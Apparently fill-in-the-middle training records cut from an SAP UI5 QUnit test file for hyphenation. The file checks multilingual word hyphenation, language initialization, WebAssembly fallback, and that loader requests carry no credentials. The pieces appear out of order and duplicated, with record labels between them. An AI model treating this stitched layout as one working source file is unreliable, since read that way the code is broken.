"et": ["Sünnipäevanädalalõpupeopärastlõunaväsimus", "Sün\u00ADni\u00ADpäe\u00ADva\u00ADnä\u00ADda\u00ADla\u00ADlõ\u00ADpu\u00ADpeo\u00ADpä\u00ADrast\u00ADlõu\u00ADna\u00ADvä\u00ADsi\u00ADmus"],
"fi": ["kolmivaihekilowattituntimittari", "kolmivaihekilowattituntimittari"],
"fr": ["hippopotomonstrosesquippedaliophobie", "hip\u00ADpo\u00ADpo\u00ADto\u00ADmons\u00ADtro\u00ADses\u00ADquip\u00ADpe\u00ADda\u00ADlio\u00ADpho\u00ADbie"],
"de": ["Kindercarnavalsoptochtvoorbereidingswerkzaamheden", "Kin\u00ADder\u00ADcar\u00ADna\u00ADvals\u00ADop\u00ADtocht\u00ADvo\u00ADor\u00ADberei\u00ADdings\u00ADwerk\u00ADzaam\u00ADhe\u00ADden"], // original word was Kindercarnavalsoptochtvoorbereidingswerkzaamhedenplan
"de-at": ["Kindercarnavalsoptochtvoorbereidingswerkzaamheden", "Kin\u00ADder\u00ADcar\u00ADna\u00ADvals\u00ADop\u00ADtocht\u00ADvo\u00ADor\u00ADberei\u00ADdings\u00ADwerk\u00ADzaam\u00ADhe\u00ADden"],
"el": ["ηλεκτροεγκεφαλογράφημα", "ηλε\u00ADκτρο\u00ADε\u00ADγκε\u00ADφα\u00ADλο\u00ADγρά\u00ADφημα"],
"hi": ["किंकर्तव्यविमूढ़", "किं\u00ADक\u00ADर्त\u00ADव्य\u00ADवि\u00ADमूढ़"],
"hu": ["Megszentségteleníthetetlenségeskedéseitekért", "Meg\u00ADszent\u00ADség\u00ADte\u00ADle\u00ADnít\u00ADhe\u00ADtet\u00ADlen\u00ADsé\u00ADges\u00ADke\u00ADdé\u00ADse\u00ADi\u00ADte\u00ADkért"],
"it": ["hippopotomonstrosesquippedaliofobia", "hip\u00ADpo\u00ADpo\u00ADto\u00ADmon\u00ADstro\u00ADse\u00ADsquip\u00ADpe\u00ADda\u00ADlio\u00ADfo\u00ADbia"],
"lt": ["nebeprisikiškiakopūstlapiaujančiuosiuose", "nebe\u00ADpri\u00ADsi\u00ADkiš\u00ADkia\u00ADko\u00ADpūst\u00ADla\u00ADpiau\u00ADjan\u00ADčiuo\u00ADsiuose"],
"no": ["Omtrentlig", "Omtrent\u00ADlig"],
"pt": ["pneumoultramicroscopicossilicovulcanoconiose", "pneu\u00ADmoul\u00ADtra\u00ADmi\u00ADcros\u00ADco\u00ADpi\u00ADcos\u00ADsi\u00ADli\u00ADco\u00ADvul\u00ADca\u00ADno\u00ADco\u00ADni\u00ADose"],
"ru": ["превысокомногорассмотрительствующий", "пре\u00ADвы\u00ADсо\u00ADком\u00ADно\u00ADго\u00ADрас\u00ADсмот\u00ADри\u00ADтель\u00ADству\u00ADю\u00ADщий"],
"sl": ["Dialektičnomaterialističen", "Dia\u00ADlek\u00ADtič\u00ADno\u00ADma\u00ADte\u00ADri\u00ADa\u00ADli\u00ADsti\u00ADčen"],
"es": ["Electroencefalografistas", "Elec\u00ADtro\u00ADen\u00ADce\u00ADfa\u00ADlo\u00ADgra\u00ADfis\u00ADtas"],
"sv": ["Realisationsvinstbeskattning", "Rea\u00ADli\u00ADsa\u00ADtions\u00ADvinst\u00ADbe\u00ADskatt\u00ADning"],
"th": ["ตัวอย่างข้อความที่จะใช้ใน", "ตัว\u00ADอย่าง\u00ADข้อ\u00ADความ\u00ADที่จะ\u00ADใช้ใน"],
"tr": ["Muvaffakiyetsizleştiricileştiriveremeyebileceklerimizdenmişsinizcesine", "Muvaffakiyetsizleştiricileştiriveremeyebileceklerimizdenmişsinizcesine"],
"uk": ["Нікотинамідаденіндинуклеотидфосфат", "Ніко\u00ADти\u00ADна\u00ADмі\u00ADда\u00ADде\u00ADнін\u00ADди\u00ADну\u00ADкле\u00ADо\u00ADтид\u00ADфо\u00ADсфат"]
},
mCompoundWords = {
"en": ["factory-made", "fac\u00ADtory-\u200bmade"],
"de": ["Geheimzahl-Aufschreiber", "Geheim\u00ADzahl-\u200bAuf\u00ADschrei\u00ADber"]
},
mTexts = {
// lang: [not hyphenated, hyphenated]
"en": [
"A hyphenation algorithm is a set of rules that decides at which points a word can be broken over two lines with a hyphen.",
"A hyphen\u00ADation algo\u00ADrithm is a set of rules that decides at which points a word can be bro\u00ADken over two lines with a hyphen."
],
"de": [
"Die Worttrennung, auch Silbentrennung genannt, bezeichnet in der Orthographie die Art und Weise, wie die Wörter insbesondere am Zeilenende getrennt werden können.",
"Die Wort\u00ADtren\u00ADnung, auch Sil\u00ADben\u00ADtren\u00ADnung genannt, bezeich\u00ADnet in der Ortho\u00ADgra\u00ADphie die Art und Weise, wie die Wör\u00ADter ins\u00ADbe\u00ADson\u00ADdere am Zei\u00ADlen\u00ADende getrennt wer\u00ADden kön\u00ADnen."
],
"ru": [
"Пример текста, который будет служить для проверки перевода.",
"При\u00ADмер тек\u00ADста, кото\u00ADрый будет слу\u00ADжить для про\u00ADверки пере\u00ADвода."
]
};
function getDefaultLang() {
var oLocale = Configuration.getLocale(),
sLanguage = oLocale.getLanguage().toLowerCase();
return sLanguage;
}
var oTestDiv = createAndAppendDiv('tst1');
oTestDiv.style.cssText = [
"-moz-hyphens:auto;",
"-webkit-hyphens:auto;",
"hyphens:auto;",
"width:48px;",
"font-size:12px;",
"line-height:12px;",
"border:none;",
"padding:0;",
"word-wrap:normal"
].join("");
function canUseNativeHyphenationRaw() {
var sLanguageOnThePage = document.documentElement.getAttribute("lang").toLowerCase();
var sMappedLanguage = Configuration.getLocale().getLanguage().toLowerCase();
// adjustment of the language to correspond to Hyphenopoly pattern files (.hpb files)
switch (sMappedLanguage) {
case "en":
sMappedLanguage = "en-us";
break;
case "nb":
sMappedLanguage = "nb-no";
break;
case "no":
sMappedLanguage = "nb-no";
break;
case "el":
sMappedLanguage = "el-monoton";
break;
default:
break;
}
// we don't have a word to | sDefaultLang = getDefaultLang();
assert.strictEqual(this.oHyphenation.isLanguageInitialized(sDefaultLang), true, "default lang '" + sDefaultLang + "' was initialized");
done();
}.bind(this));
});
QUnit.test("initialize only single language - " + sSingleLangTest, function(assert) {
assert.expect(2);
var done = assert.async();
this.oHyphenation.initialize(sSingleLangTest).then(function() {
assert.strictEqual(this.oHyphenation.isLanguageInitialized(sSingleLangTest), true, "hyphenation api is initialized with language - " + sSingleLangTest);
assert.ok(this.oHyphenation.getInitializedLanguages().indexOf(sSingleLangTest) > -1, "list of initialized languages contains " + sSingleLangTest);
done();
}.bind(this)).catch(function(e) {
assert.ok(false, e);
});
});
// WebAssembly is not supported in all browsers.
if (window.WebAssembly) {
QUnit.test("Multiple initialization calls", function(assert) {
// Arrange
var done = assert.async();
var iForcedInitializations = 300;
var oSpy = this.spy(window.WebAssembly, "instantiate");
// Initialize the default language and after that try to force multiple initializations.
this.oHyphenation.initialize().then(function() {
oSpy.resetHistory();
var aPromises = [];
// Act
for (var i = 0; i < iForcedInitializations; i++) {
aPromises.push(new Promise(function (resolve) {
this.oHyphenation.initialize()
.then(resolve)
.catch(resolve);
}.bind(this)));
}
Promise.all(aPromises).then(function () {
// Assert
assert.ok(oSpy.notCalled, "Should only initialize once to avoid browser out of memory exceptions.");
// Clean up
oSpy.restore();
done();
});
}.bind(this));
});
}
QUnit.test("is language supported", function(assert) {
var that = this;
aSupportedLanguages.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.isLanguageSupported(sLang), true, sLang + " is supported");
});
aNotSupportedLanguages.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.isLanguageSupported(sLang), false, sLang + " is not supported");
});
});
QUnit.test("initialize all supported languages", function(assert) {
assert.expect(aSupportedLanguages.length + 1);
var done = assert.async(),
that = this,
counter = 0;
aSupportedLanguages.forEach(function(sLang) {
that.oHyphenation.initialize(sLang).then(function() {
counter++;
assert.strictEqual(that.oHyphenation.isLanguageInitialized(sLang), true, sLang + " is initialized");
if (counter >= aSupportedLanguages.length) {
assert.strictEqual(that.oHyphenation.getInitializedLanguages().length, aSupportedLanguages.length, "all languages are initialized");
done();
}
}).catch(function(e) {
assert.ok(false, e);
});
});
});
QUnit.test("fail to initialize not supported languages", function(assert) {
assert.expect(aNotSupportedLanguages.length * 2);
var done = assert.async(),
that = this,
counter = 0;
aNotSupportedLanguages.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.isLanguageInitialized(sLang), false, sLang + " is by default not initialized");
that.oHyphenation.initialize(sLang).then(function() {
assert.ok(false, "not supported language '" + sLang + "' was initialized");
}).catch(function(e) {
counter++;
assert.ok(true, sLang + " is not supported");
if (counter === aNotSupportedLanguages.length) {
done();
}
});
});
});
QUnit.module("Hyphenation", {
before : function () {
this.oHyphenation = Hyphenation.getInstance();
}
});
QUnit.test("can use third party hyphenation", function(assert) {
var that = this;
aSupportedLanguages.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.canUseThirdPartyHyphenation(sLang), true, sLang + " is supported");
});
aLanguagesWithNoThirdParty.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.canUseThirdPartyHyphenation(sLang), false, sLang + " is not supported");
});
});
QUnit.test("can use native hyphenation", function(assert) {
assert.strictEqual(canUseNativeHyphenationRaw(), this.oHyphenation.canUseNativeHyphenation(), "The Hyphenation instance should give the same result as the raw check.");
});
QUnit.test("hyphenate example words", function(assert) {
var done = assert.async(),
that = this,
counter = 0,
aLanguages = Object.keys(mWords);
assert.expect(aLanguages.length + Object.keys(mCompoundWords).length);
aLanguages.forEach(function(sLang) {
that.oHyphenation.initialize(sLang).then(function() {
counter++;
assert.strictEqual(
that.oHyphenation.hyphenate(mWords[sLang][0], sLang),
mWords[sLang][1],
"hyphenation of example word for '" + sLang + "' is ok"
);
if (mCompoundWords.hasOwnProperty(sLang)) {
assert.strictEqual(
that.oHyphenation.hyphenate(mCompoundWords[sLang][0], sLang),
mCompoundWords[sLang][1],
"compound word hyphenation for '" + sLang + "' is ok"
);
}
if (counter === aLanguages.length) {
done();
}
});
});
});
QUnit.test("hyphenate example texts", function(assert) {
var done = assert.async(),
that = this,
counter = 0,
aLanguages = Object.keys(mTexts);
assert.expect(aLanguages.length);
aLanguages.forEach(function(sLang) {
that.oHyphenation.initialize(sLang).then(function() {
counter++;
assert.strictEqual(
that.oHyphenation.hyphenate(mTexts[sLang][0], sLang),
mTexts[sLang][1],
"hyphenation of example text for '" + sLang + "' is ok"
);
if (counter === aLanguages.length) {
done();
}
});
});
});
QUnit.test("fail to hyphenate with not initialized language", function(assert) {
var oErrorLogSpy = this.spy(Log, "error"),
onError = function() {
assert.ok(true, "error event was thrown");
};
this.oHyphenation.attachEvent("error", onError);
assert.strictEqual(this.oHyphenation.hyphenate("Lorem ipsum", "test-lang"), "Lorem ipsum", "hyphenate of uninitialized lang returns the same text without changes");
assert.ok(oErrorLogSpy.calledOnce, "an error was logged");
Log.error.restore();
this.oHyphenation.detachEvent("error", onError);
});
QUnit.module("Hyphenopoly_Loader and Hyphenopoly.js overrides");
QUnit.test("No credentials are sent when request is made", function (assert) {
// Arrange
var done = assert.async();
var oFetchSpy = sinon.spy(window, "fetch");
window.Hyphenopoly = {
require: {
"en-us": "FORCEHYPHENOPOLY"
},
setup: {
keepAlive: false,
hide: "DONT_HIDE"
},
handleEvent: {
error: function () {
// Assert
assert.notOk(
oFetchSpy.calledWith(sinon.match.any, { credentials: "include" }),
"Credentials must NOT be included in the request"
);
// Clean up
oFetchSpy.restore();
},
hyphenopolyEnd: function () {
done();
}
}
};
// Act
includeScript({
url: sap.ui.require.toUrl("sap/ui/thirdparty/hyphenopoly/Hyphenopoly_Loader.js")
});
});
QUnit.test("Auto fallback to asm.js when wasm is not allowed", function (assert) {
// Arrange
var done = assert.async();
var oWasmInstanceStub = sinon.stub(WebAssembly, "Instance").throws("WebAssembly can't be used due to CSP restrictions.");
window.Hyphenopoly = {
require: {
"en-us": "FORCEHYPHENOPOLY"
},
setup: {
keepAlive: false,
hide: "DONT_HIDE"
},
handleEvent: {
engineReady: function (e) {
// Assert
assert.strictEqual(window.Hyphenopoly.cf.wasm, false);
// Clean up
oWasmInstanceStub.restore();
},
hyphenopolyEnd: function () {
done();
}
}
};
// Act
includeScript({
url: sap.ui.require.toUrl("sap/ui/thirdparty/hyphenopoly/Hyphenopoly_Loader.js")
});
});
});
| test for this language
if (!HyphenationTestingWords[sMappedLanguage]) {
return false;
}
oTestDiv.lang = sLanguageOnThePage;
oTestDiv.innerText = HyphenationTestingWords[sMappedLanguage];
// Chrome on macOS partially supported native hyphenation. It didn't hyphenate one word more than once.
if (Device.os.macintosh && Device.browser.chrome) {
return oTestDiv.offsetHeight > 24; // check if word is hyphenated more than once
}
return oTestDiv.offsetHeight > 12;
}
QUnit.module("Instance");
QUnit.test("create instance", function(assert) {
var oHyphenation = Hyphenation.getInstance();
assert.ok(oHyphenation, "instance is created");
assert.strictEqual(oHyphenation.isA("sap.ui.core.hyphenation.Hyphenation"), true, "instance is correct");
});
QUnit.module("Initialization", {
before: function () {
this.oHyphenation = Hyphenation.getInstance();
}
});
QUnit.test("default initialize", function(assert) {
assert.expect(1);
var done = assert.async();
this.oHyphenation.initialize().then(function() {
var | identifier_body |
Hyphenation.qunit.js | /*global QUnit, sinon */
sap.ui.define("sap/ui/core/qunit/Hyphenation.qunit", [
"sap/ui/core/hyphenation/Hyphenation",
"sap/ui/core/hyphenation/HyphenationTestingWords",
"sap/ui/dom/includeScript",
"sap/base/Log",
"sap/ui/Device",
"sap/ui/qunit/utils/createAndAppendDiv",
"sap/ui/core/Configuration"
], function(
Hyphenation,
HyphenationTestingWords,
includeScript,
Log,
Device,
createAndAppendDiv,
Configuration
) {
"use strict";
var sSingleLangTest = "de",
aSupportedLanguages = [
"bg",
"ca",
"hr",
"da",
"nl",
"en",
"et",
"fi",
"fr",
"de",
"el",
"hi",
"hu",
"it",
"lt",
"no",
"pt",
"ru",
"sl",
"es",
"sv",
"th",
"tr",
"uk"
],
aLanguagesWithNoThirdParty = [
"cs", "pl", "sr"
],
aNotSupportedLanguages = [
"mn", "vi", "test-lang"
],
mWords = {
// lang: [not hyphenated, hyphenated]
"bg": ["непротивоконституционствувателствувайте", "неп\u00ADро\u00ADти\u00ADво\u00ADкон\u00ADс\u00ADти\u00ADту\u00ADци\u00ADон\u00ADс\u00ADт\u00ADву\u00ADва\u00ADтел\u00ADс\u00ADт\u00ADву\u00ADвайте"],
"ca": ["Psiconeuroimmunoendocrinologia", "Psi\u00ADco\u00ADneu\u00ADroim\u00ADmu\u00ADno\u00ADen\u00ADdo\u00ADcri\u00ADno\u00ADlo\u00ADgia"],
"hr": ["prijestolonasljednikovičičinima", "pri\u00ADjes\u00ADto\u00ADlo\u00ADna\u00ADs\u00ADljed\u00ADni\u00ADko\u00ADvi\u00ADči\u00ADči\u00ADnima"],
"da": ["Gedebukkebensoverogundergeneralkrigskommander", "Gede\u00ADbuk\u00ADke\u00ADben\u00ADsoverogun\u00ADder\u00ADge\u00ADne\u00ADral\u00ADkrigskom\u00ADman\u00ADder"], // original word was Gedebukkebensoverogundergeneralkrigskommandersergenten
"nl": ["meervoudigepersoonlijkheidsstoornissen", "meer\u00ADvou\u00ADdi\u00ADge\u00ADper\u00ADsoon\u00ADlijk\u00ADheids\u00ADstoor\u00ADnis\u00ADsen"],
"en": ["pneumonoultramicroscopicsilicovolcanoconiosis", "pneu\u00ADmo\u00ADnoul\u00ADtra\u00ADmi\u00ADcro\u00ADscop\u00ADic\u00ADsil\u00ADi\u00ADco\u00ADvol\u00ADcanoco\u00ADnio\u00ADsis"],
"en-gb": ["pneumonoultramicroscopicsilicovolcanoconiosis", "pneu\u00ADmo\u00ADnoul\u00ADtra\u00ADmi\u00ADcro\u00ADscop\u00ADic\u00ADsil\u00ADi\u00ADco\u00ADvol\u00ADcanoco\u00ADnio\u00ADsis"],
"en-us": ["pneumonoultramicroscopicsilicovolcanoconiosis", "pneu\u00ADmo\u00ADnoul\u00ADtra\u00ADmi\u00ADcro\u00ADscop\u00ADic\u00ADsil\u00ADi\u00ADco\u00ADvol\u00ADcanoco\u00ADnio\u00ADsis"],
"et": ["Sünnipäevanädalalõpupeopärastlõunaväsimus", "Sün\u00ADni\u00ADpäe\u00ADva\u00ADnä\u00ADda\u00ADla\u00ADlõ\u00ADpu\u00ADpeo\u00ADpä\u00ADrast\u00ADlõu\u00ADna\u00ADvä\u00ADsi\u00ADmus"],
"fi": ["kolmivaihekilowattituntimittari", "kolmivaihekilowattituntimittari"],
"fr": ["hippopotomonstrosesquippedaliophobie", "hip\u00ADpo\u00ADpo\u00ADto\u00ADmons\u00ADtro\u00ADses\u00ADquip\u00ADpe\u00ADda\u00ADlio\u00ADpho\u00ADbie"],
"de": ["Kindercarnavalsoptochtvoorbereidingswerkzaamheden", "Kin\u00ADder\u00ADcar\u00ADna\u00ADvals\u00ADop\u00ADtocht\u00ADvo\u00ADor\u00ADberei\u00ADdings\u00ADwerk\u00ADzaam\u00ADhe\u00ADden"], // original word was Kindercarnavalsoptochtvoorbereidingswerkzaamhedenplan
"de-at": ["Kindercarnavalsoptochtvoorbereidingswerkzaamheden", "Kin\u00ADder\u00ADcar\u00ADna\u00ADvals\u00ADop\u00ADtocht\u00ADvo\u00ADor\u00ADberei\u00ADdings\u00ADwerk\u00ADzaam\u00ADhe\u00ADden"],
"el": ["ηλεκτροεγκεφαλογράφημα", "ηλε\u00ADκτρο\u00ADε\u00ADγκε\u00ADφα\u00ADλο\u00ADγρά\u00ADφημα"],
"hi": ["किंकर्तव्यविमूढ़", "किं\u00ADक\u00ADर्त\u00ADव्य\u00ADवि\u00ADमूढ़"],
"hu": ["Megszentségteleníthetetlenségeskedéseitekért", "Meg\u00ADszent\u00ADség\u00ADte\u00ADle\u00ADnít\u00ADhe\u00ADtet\u00ADlen\u00ADsé\u00ADges\u00ADke\u00ADdé\u00ADse\u00ADi\u00ADte\u00ADkért"],
"it": ["hippopotomonstrosesquippedaliofobia", "hip\u00ADpo\u00ADpo\u00ADto\u00ADmon\u00ADstro\u00ADse\u00ADsquip\u00ADpe\u00ADda\u00ADlio\u00ADfo\u00ADbia"],
"lt": ["nebeprisikiškiakopūstlapiaujančiuosiuose", "nebe\u00ADpri\u00ADsi\u00ADkiš\u00ADkia\u00ADko\u00ADpūst\u00ADla\u00ADpiau\u00ADjan\u00ADčiuo\u00ADsiuose"],
"no": ["Omtrentlig", "Omtrent\u00ADlig"],
"pt": ["pneumoultramicroscopicossilicovulcanoconiose", "pneu\u00ADmoul\u00ADtra\u00ADmi\u00ADcros\u00ADco\u00ADpi\u00ADcos\u00ADsi\u00ADli\u00ADco\u00ADvul\u00ADca\u00ADno\u00ADco\u00ADni\u00ADose"],
"ru": ["превысокомногорассмотрительствующий", "пре\u00ADвы\u00ADсо\u00ADком\u00ADно\u00ADго\u00ADрас\u00ADсмот\u00ADри\u00ADтель\u00ADству\u00ADю\u00ADщий"],
"sl": ["Dialektičnomaterialističen", "Dia\u00ADlek\u00ADtič\u00ADno\u00ADma\u00ADte\u00ADri\u00ADa\u00ADli\u00ADsti\u00ADčen"],
"es": ["Electroencefalografistas", "Elec\u00ADtro\u00ADen\u00ADce\u00ADfa\u00ADlo\u00ADgra\u00ADfis\u00ADtas"],
"sv": ["Realisationsvinstbeskattning", "Rea\u00ADli\u00ADsa\u00ADtions\u00ADvinst\u00ADbe\u00ADskatt\u00ADning"],
"th": ["ตัวอย่างข้อความที่จะใช้ใน", "ตัว\u00ADอย่าง\u00ADข้อ\u00ADความ\u00ADที่จะ\u00ADใช้ใน"],
"tr": ["Muvaffakiyetsizleştiricileştiriveremeyebileceklerimizdenmişsinizcesine", "Muvaffakiyetsizleştiricileştiriveremeyebileceklerimizdenmişsinizcesine"],
"uk": ["Нікотинамідаденіндинуклеотидфосфат", "Ніко\u00ADти\u00ADна\u00ADмі\u00ADда\u00ADде\u00ADнін\u00ADди\u00ADну\u00ADкле\u00ADо\u00ADтид\u00ADфо\u00ADсфат"]
},
mCompoundWords = {
"en": ["factory-made", "fac\u00ADtory-\u200bmade"],
"de": ["Geheimzahl-Aufschreiber", "Geheim\u00ADzahl-\u200bAuf\u00ADschrei\u00ADber"]
},
mTexts = {
// lang: [not hyphenated, hyphenated]
"en": [
"A hyphenation algorithm is a set of rules that decides at which points a word can be broken over two lines with a hyphen.",
"A hyphen\u00ADation algo\u00ADrithm is a set of rules that decides at which points a word can be bro\u00ADken over two lines with a hyphen."
],
"de": [
"Die Worttrennung, auch Silbentrennung genannt, bezeichnet in der Orthographie die Art und Weise, wie die Wörter insbesondere am Zeilenende getrennt werden können.",
"Die Wort\u00ADtren\u00ADnung, auch Sil\u00ADben\u00ADtren\u00ADnung genannt, bezeich\u00ADnet in der Ortho\u00ADgra\u00ADphie die Art und Weise, wie die Wör\u00ADter ins\u00ADbe\u00ADson\u00ADdere am Zei\u00ADlen\u00ADende getrennt wer\u00ADden kön\u00ADnen."
],
"ru": [
"Пример текста, который будет служить для проверки перевода.",
"При\u00ADмер тек\u00ADста, кото\u00ADрый будет слу\u00ADжить для про\u00ADверки пере\u00ADвода."
]
};
function getDefaultLang() {
var oLocale = Configuration.getLocale(),
sLanguage = oLocale.getLanguage().toLowerCase();
return sLanguage;
}
var oTestDiv = createAndAppendDiv('tst1');
oTestDiv.style.cssText = [
"-moz-hyphens:auto;",
"-webkit-hyphens:auto;",
"hyphens:auto;",
"width:48px;",
"font-size:12px;",
"line-height:12px;",
"border:none;",
"padding:0;",
"word-wrap:normal"
].join("");
function canUseNativeHyphenationRaw() {
var sLanguageOnThePage = document.documentElement.getAttribute("lang").toLowerCase();
var sMappedLanguage = Configuration.getLocale().getLanguage().toLowerCase();
// adjustment of the language to correspond to Hyphenopoly pattern files (.hpb files)
switch (sMappedLanguage) {
case "en":
sMappedLanguage = "en-us";
break;
case "nb":
sMappedLanguage = "nb-no";
break;
case "no":
sMappedLanguage = "nb-no";
break;
case "el":
sMappedLanguage = "el-monoton";
break;
default:
break;
}
| if (!HyphenationTestingWords[sMappedLanguage]) {
return false;
}
oTestDiv.lang = sLanguageOnThePage;
oTestDiv.innerText = HyphenationTestingWords[sMappedLanguage];
// Chrome on macOS partially supported native hyphenation. It didn't hyphenate one word more than once.
if (Device.os.macintosh && Device.browser.chrome) {
return oTestDiv.offsetHeight > 24; // check if word is hyphenated more than once
}
return oTestDiv.offsetHeight > 12;
}
QUnit.module("Instance");
QUnit.test("create instance", function(assert) {
var oHyphenation = Hyphenation.getInstance();
assert.ok(oHyphenation, "instance is created");
assert.strictEqual(oHyphenation.isA("sap.ui.core.hyphenation.Hyphenation"), true, "instance is correct");
});
QUnit.module("Initialization", {
before: function () {
this.oHyphenation = Hyphenation.getInstance();
}
});
QUnit.test("default initialize", function(assert) {
assert.expect(1);
var done = assert.async();
this.oHyphenation.initialize().then(function() {
var sDefaultLang = getDefaultLang();
assert.strictEqual(this.oHyphenation.isLanguageInitialized(sDefaultLang), true, "default lang '" + sDefaultLang + "' was initialized");
done();
}.bind(this));
});
QUnit.test("initialize only single language - " + sSingleLangTest, function(assert) {
assert.expect(2);
var done = assert.async();
this.oHyphenation.initialize(sSingleLangTest).then(function() {
assert.strictEqual(this.oHyphenation.isLanguageInitialized(sSingleLangTest), true, "hyphenation api is initialized with language - " + sSingleLangTest);
assert.ok(this.oHyphenation.getInitializedLanguages().indexOf(sSingleLangTest) > -1, "list of initialized languages contains " + sSingleLangTest);
done();
}.bind(this)).catch(function(e) {
assert.ok(false, e);
});
});
// WebAssembly is not supported in all browsers.
if (window.WebAssembly) {
QUnit.test("Multiple initialization calls", function(assert) {
// Arrange
var done = assert.async();
var iForcedInitializations = 300;
var oSpy = this.spy(window.WebAssembly, "instantiate");
// Initialize the default language and after that try to force multiple initializations.
this.oHyphenation.initialize().then(function() {
oSpy.resetHistory();
var aPromises = [];
// Act
for (var i = 0; i < iForcedInitializations; i++) {
aPromises.push(new Promise(function (resolve) {
this.oHyphenation.initialize()
.then(resolve)
.catch(resolve);
}.bind(this)));
}
Promise.all(aPromises).then(function () {
// Assert
assert.ok(oSpy.notCalled, "Should only initialize once to avoid browser out of memory exceptions.");
// Clean up
oSpy.restore();
done();
});
}.bind(this));
});
}
QUnit.test("is language supported", function(assert) {
var that = this;
aSupportedLanguages.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.isLanguageSupported(sLang), true, sLang + " is supported");
});
aNotSupportedLanguages.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.isLanguageSupported(sLang), false, sLang + " is not supported");
});
});
QUnit.test("initialize all supported languages", function(assert) {
assert.expect(aSupportedLanguages.length + 1);
var done = assert.async(),
that = this,
counter = 0;
aSupportedLanguages.forEach(function(sLang) {
that.oHyphenation.initialize(sLang).then(function() {
counter++;
assert.strictEqual(that.oHyphenation.isLanguageInitialized(sLang), true, sLang + " is initialized");
if (counter >= aSupportedLanguages.length) {
assert.strictEqual(that.oHyphenation.getInitializedLanguages().length, aSupportedLanguages.length, "all languages are initialized");
done();
}
}).catch(function(e) {
assert.ok(false, e);
});
});
});
QUnit.test("fail to initialize not supported languages", function(assert) {
assert.expect(aNotSupportedLanguages.length * 2);
var done = assert.async(),
that = this,
counter = 0;
aNotSupportedLanguages.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.isLanguageInitialized(sLang), false, sLang + " is by default not initialized");
that.oHyphenation.initialize(sLang).then(function() {
assert.ok(false, "not supported language '" + sLang + "' was initialized");
}).catch(function(e) {
counter++;
assert.ok(true, sLang + " is not supported");
if (counter === aNotSupportedLanguages.length) {
done();
}
});
});
});
QUnit.module("Hyphenation", {
before : function () {
this.oHyphenation = Hyphenation.getInstance();
}
});
QUnit.test("can use third party hyphenation", function(assert) {
var that = this;
aSupportedLanguages.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.canUseThirdPartyHyphenation(sLang), true, sLang + " is supported");
});
aLanguagesWithNoThirdParty.forEach(function(sLang) {
assert.strictEqual(that.oHyphenation.canUseThirdPartyHyphenation(sLang), false, sLang + " is not supported");
});
});
QUnit.test("can use native hyphenation", function(assert) {
assert.strictEqual(canUseNativeHyphenationRaw(), this.oHyphenation.canUseNativeHyphenation(), "The Hyphenation instance should give the same result as the raw check.");
});
QUnit.test("hyphenate example words", function(assert) {
var done = assert.async(),
that = this,
counter = 0,
aLanguages = Object.keys(mWords);
assert.expect(aLanguages.length + Object.keys(mCompoundWords).length);
aLanguages.forEach(function(sLang) {
that.oHyphenation.initialize(sLang).then(function() {
counter++;
assert.strictEqual(
that.oHyphenation.hyphenate(mWords[sLang][0], sLang),
mWords[sLang][1],
"hyphenation of example word for '" + sLang + "' is ok"
);
if (mCompoundWords.hasOwnProperty(sLang)) {
assert.strictEqual(
that.oHyphenation.hyphenate(mCompoundWords[sLang][0], sLang),
mCompoundWords[sLang][1],
"compound word hyphenation for '" + sLang + "' is ok"
);
}
if (counter === aLanguages.length) {
done();
}
});
});
});
QUnit.test("hyphenate example texts", function(assert) {
var done = assert.async(),
that = this,
counter = 0,
aLanguages = Object.keys(mTexts);
assert.expect(aLanguages.length);
aLanguages.forEach(function(sLang) {
that.oHyphenation.initialize(sLang).then(function() {
counter++;
assert.strictEqual(
that.oHyphenation.hyphenate(mTexts[sLang][0], sLang),
mTexts[sLang][1],
"hyphenation of example text for '" + sLang + "' is ok"
);
if (counter === aLanguages.length) {
done();
}
});
});
});
QUnit.test("fail to hyphenate with not initialized language", function(assert) {
var oErrorLogSpy = this.spy(Log, "error"),
onError = function() {
assert.ok(true, "error event was thrown");
};
this.oHyphenation.attachEvent("error", onError);
assert.strictEqual(this.oHyphenation.hyphenate("Lorem ipsum", "test-lang"), "Lorem ipsum", "hyphenate of uninitialized lang returns the same text without changes");
assert.ok(oErrorLogSpy.calledOnce, "an error was logged");
Log.error.restore();
this.oHyphenation.detachEvent("error", onError);
});
QUnit.module("Hyphenopoly_Loader and Hyphenopoly.js overrides");
QUnit.test("No credentials are sent when request is made", function (assert) {
// Arrange
var done = assert.async();
var oFetchSpy = sinon.spy(window, "fetch");
window.Hyphenopoly = {
require: {
"en-us": "FORCEHYPHENOPOLY"
},
setup: {
keepAlive: false,
hide: "DONT_HIDE"
},
handleEvent: {
error: function () {
// Assert
assert.notOk(
oFetchSpy.calledWith(sinon.match.any, { credentials: "include" }),
"Credentials must NOT be included in the request"
);
// Clean up
oFetchSpy.restore();
},
hyphenopolyEnd: function () {
done();
}
}
};
// Act
includeScript({
url: sap.ui.require.toUrl("sap/ui/thirdparty/hyphenopoly/Hyphenopoly_Loader.js")
});
});
QUnit.test("Auto fallback to asm.js when wasm is not allowed", function (assert) {
// Arrange
var done = assert.async();
var oWasmInstanceStub = sinon.stub(WebAssembly, "Instance").throws("WebAssembly can't be used due to CSP restrictions.");
window.Hyphenopoly = {
require: {
"en-us": "FORCEHYPHENOPOLY"
},
setup: {
keepAlive: false,
hide: "DONT_HIDE"
},
handleEvent: {
engineReady: function (e) {
// Assert
assert.strictEqual(window.Hyphenopoly.cf.wasm, false);
// Clean up
oWasmInstanceStub.restore();
},
hyphenopolyEnd: function () {
done();
}
}
};
// Act
includeScript({
url: sap.ui.require.toUrl("sap/ui/thirdparty/hyphenopoly/Hyphenopoly_Loader.js")
});
});
}); | // we don't have a word to test for this language | random_line_split |
Hyphenation.qunit.js | /*global QUnit, sinon */
sap.ui.define("sap/ui/core/qunit/Hyphenation.qunit", [
"sap/ui/core/hyphenation/Hyphenation",
"sap/ui/core/hyphenation/HyphenationTestingWords",
"sap/ui/dom/includeScript",
"sap/base/Log",
"sap/ui/Device",
"sap/ui/qunit/utils/createAndAppendDiv",
"sap/ui/core/Configuration"
], function(
Hyphenation,
HyphenationTestingWords,
includeScript,
Log,
